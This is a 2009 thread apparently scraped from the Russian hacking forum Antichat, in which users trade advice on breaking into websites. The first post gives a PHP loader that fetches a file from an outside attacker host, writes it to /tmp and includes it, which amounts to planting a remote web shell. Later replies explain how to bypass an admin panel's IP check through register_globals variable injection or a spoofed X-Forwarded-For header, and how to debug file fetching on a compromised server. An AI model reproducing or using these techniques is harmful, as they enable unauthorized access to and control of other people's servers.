Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.07.2009, 13:29
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Заливай upl.inc на левый хост
Через echo заливай етот скрипт
Код:
<?php
if (isset($_GET[p]))
{
$f=fopen('/tmp/qwerty','w+');
fwrite($f,file_get_contents('http://www.левый-хост/upl.inc'));
}
include('/tmp/qwerty');
?>
потом
shell.php?p
Последний раз редактировалось The_HuliGun; 29.07.2009 в 13:36..
|
|
|
29.07.2009, 13:56
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226
Репутация:
38
|
|
есть админка, вроде самописная, так же имеется логин и пас к ней, но при попытке войти выдает что нельзя зайти с данного ip.
Вопрос как возможно обойти ето дрянь, можно ли подменить IP на IP администратора сайта
|
|
|
|
29.07.2009, 14:02
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Экстрасенсов здесь нет. Мы не знаем каким способом проверяется IP. Если типа
PHP код:
#....
if($_SERVER['REMOTE_ADDR']==$trueip)
$welcome=true; else
$welcome=false;
#....
Не подменить никак...
Ну а если включены регистер_глобался, т.е. ключ => значение массива $_GLOBALS будет равно названию => значению переменной, и IP берется с названия этой переменной, тогда просто в GET/POST/COOKIE подставь ip(название переменной)=0.0.0.0(админский IP).
Повторю, экстрасенсов здесь нет.
Последний раз редактировалось mailbrush; 29.07.2009 в 14:08..
|
|
|
|
29.07.2009, 14:07
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226
Репутация:
38
|
|
а как узнать как он проверяется?
|
|
|
|
29.07.2009, 14:09
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
а как узнать как он проверяется?
Взглянуть в сорсы 
|
|
|
|
29.07.2009, 14:17
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Tigger
jokester, allow_url_open 1, copy не помогло. Unable to open 'http://img.imgsmail.ru/mail/ru/images/logon.gif' for reading: No such file or directory in... Даже просто картинку не хочет...
Так не бывает.
Давай сюда
1. Что прописано в логах (через что ты выполняешь комманды. КОД)
2. phpinfo() директивы
allow_url_fopen
allow_url_include
magic_quotes_gpc
safe_mode
disable_functions
3. ls -lia (ты-же как-то качалки искал, значит возможно)
4. Как ты пытаешься залить через copy (полностью)
|
|
|
|
29.07.2009, 14:29
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Сообщение от mailbrush
Взглянуть в сорсы Или методом тыка Попробуй подменить x_forwarder_for, хотя сейчас уже мало где проверяют так, но всё же...
|
|
|
|
29.07.2009, 18:33
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
В статье электа написано про то, что если в значение сессион ид вставить спецсимволы,то будет ошибка и раскрытие путей. Как защитится от этого? Спрашивал очень многих, никто ничего сказать не смог.
|
|
|
|
29.07.2009, 18:43
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Фильтруй регулярками.
|
|
|
|
29.07.2009, 18:44
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
@session_start();
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1416607){kind=avatar}
Похожие темы
Линейный вид
